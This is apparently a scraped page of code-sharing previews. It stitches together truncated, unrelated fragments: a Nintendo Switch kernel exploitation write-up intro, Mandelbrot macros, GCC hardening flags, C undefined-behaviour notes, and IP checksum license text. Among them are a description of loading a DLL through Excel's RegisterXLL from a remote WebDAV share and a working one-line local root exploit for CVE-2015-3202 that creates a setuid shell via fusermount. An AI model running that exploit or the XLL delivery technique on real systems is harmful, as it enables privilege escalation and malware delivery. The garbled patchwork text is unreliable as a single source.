https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA
The following is a write-up of how I initially achieved kernel code execution on the Nintendo Switch, very much inspired by hexkyz's write-ups. The work discussed was completed over the course of a single conversation between hthh and I during the evening of November 21st, 2017. A number of snippets are attached from that conversation as inline links, in the hopes that they'll be interesting to readers.
I would recommend one read hexkyz's recent write-up on how the switch was broken into via GPU DMA attacks. It's a great read!
In particular, he describes:
Additionally, the kernel itself would start allocating memory outside of the carveout region
#include <stdio.h> | |
#define SQ(x) (x)*(x) | |
#define M0(x,y) SQ(x)+SQ(y)<4?0:0xe0 | |
#define M1(x,y,x0,y0) (SQ(x)+SQ(y)<4)?M0(SQ(x)-SQ(y)+(x0),2*(x)*(y)+(y0)):0xc0 | |
#define M2(x,y,x0,y0) (SQ(x)+SQ(y)<4)?M1(SQ(x)-SQ(y)+(x0),2*(x)*(y)+(y0),x0,y0):0xa0 | |
#define M3(x,y,x0,y0) (SQ(x)+SQ(y)<4)?M2(SQ(x)-SQ(y)+(x0),2*(x)*(y)+(y0),x0,y0):0x80 | |
#define M4(x,y,x0,y0) (SQ(x)+SQ(y)<4)?M3(SQ(x)-SQ(y)+(x0),2*(x)*(y)+(y0),x0,y0):0x60 | |
#define M5(x,y,x0,y0) (SQ(x)+SQ(y)<4)?M4(SQ(x)-SQ(y)+(x0),2*(x)*(y)+(y0),x0,y0):0x40 |
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
#include <stdio.h> | |
#include <errno.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#include <assert.h> | |
#include <string.h> | |
#define streq(a, b) (!strcmp((a), (b))) | |
#ifndef __USE_GNU | |
#define __USE_GNU |
/* | |
* IP checksumming functions. | |
* (c) 2008 Gerd Hoffmann <kraxel@redhat.com> | |
* | |
* This program is free software; you can redistribute it and/or modify | |
* it under the terms of the GNU General Public License as published by | |
* the Free Software Foundation; under version 2 of the License. | |
* | |
* This program is distributed in the hope that it will be useful, | |
* but WITHOUT ANY WARRANTY; without even the implied warranty of |
Source material: | |
http://security.stackexchange.com/questions/24444/what-is-the-most-hardened-set-of-options-for-gcc-compiling-c-c | |
https://wiki.gentoo.org/wiki/Hardened_Gentoo | |
https://wiki.debian.org/Hardening | |
================================================================================================================> | |
GCC Security related flags and options: | |
CFLAGS="-fPIE -fstack-protector-all -D_FORTIFY_SOURCE=2" | |
LDFLAGS="-Wl,-z,now -Wl,-z,relro" |
Why do compilers even bother with exploiting undefinedness signed overflow? And what are those | |
mysterious cases where it helps? | |
A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but | |
I think it's useful to know what compiler writers are accomplishing by this. | |
TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all | |
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some | |
fairly common cases. The signed overflow UB exploitation is an attempt to work around this. |
From N1256: (See http://port70.net/~nsz/c/c99/n1256.html#J.2)
- A "shall" or "shall not" requirement that appears outside of a constraint is violated (clause 4).
- A nonempty source file does not end in a new-line character which is not immediately preceded by a backslash character or ends in a partial preprocessing token or comment (5.1.1.2).
- Token concatenation produces a character sequence matching the syntax of a universal character name (5.1.1.2).
- A program in a hosted environment does not define a function named
main
using one of the specified forms (5.1.2.2.1). - A character not in the basic source character set is encountered in a source file, except in an identifier, a character constant, a string literal, a header name, a comment, or a preprocessing token that is never converted to a token (5.2.1).
- An identifier, comment, string literal, character constant, or header name contains an invalid multibyte character or does not
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
# Here's how it works, $a holds the name of a shellscript to be executed as | |
# root. | |
a=/tmp/.$$; | |
# $b is used twice, first to build the contents of shellscript $a, and then as |